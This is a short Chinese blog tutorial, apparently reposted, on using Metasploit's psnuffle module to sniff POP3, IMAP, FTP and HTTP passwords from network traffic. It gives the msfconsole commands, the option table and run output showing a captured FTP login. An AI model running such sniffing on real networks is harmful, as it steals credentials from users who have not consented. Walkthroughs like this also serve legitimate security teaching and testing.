不乱于心,不困于情。
不畏将来,不念过往。如此,安好。

使用METASPLOIT进行密码嗅探

Max Moser发布了一个名为psnuffle的Metasploit密码嗅探模块,它将类似于工具dsniff一样从网络上嗅探密码。它目前支持POP3,IMAP,FTP和HTTP GET。

使用psnuffle模块非常简单。有一些可用选项,但该模块“开箱即用”时效果很好。

msf > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > show options

Module options:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILTER                      no        The filter string for capturing traffic
   INTERFACE                   no        The name of the interface
   PCAPFILE                    no        The name of the PCAP capture file to process
   PROTOCOLS  all              yes       A comma-delimited list of protocols to sniff or "all".
   SNAPLEN    65535            yes       The number of bytes to capture
   TIMEOUT    1                yes       The number of seconds to wait for new data

有一些选项可用,包括导入pcap捕获文件的功能。我们将以默认模式运行psnuffle扫描器。

msf auxiliary(psnuffle) > run
[*] Auxiliary module execution completed
[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[*] Successful FTP Login: 192.168.1.100:21-192.168.1.5:48614 >> victim / pass (220 3Com 3CDaemon FTP Server Version 2.0)

那里!我们已成功登录FTP。这是用于被动信息收集的出色工具。

赞(0)
未经允许不得转载:seo优化_前端开发_渗透技术 » 使用METASPLOIT进行密码嗅探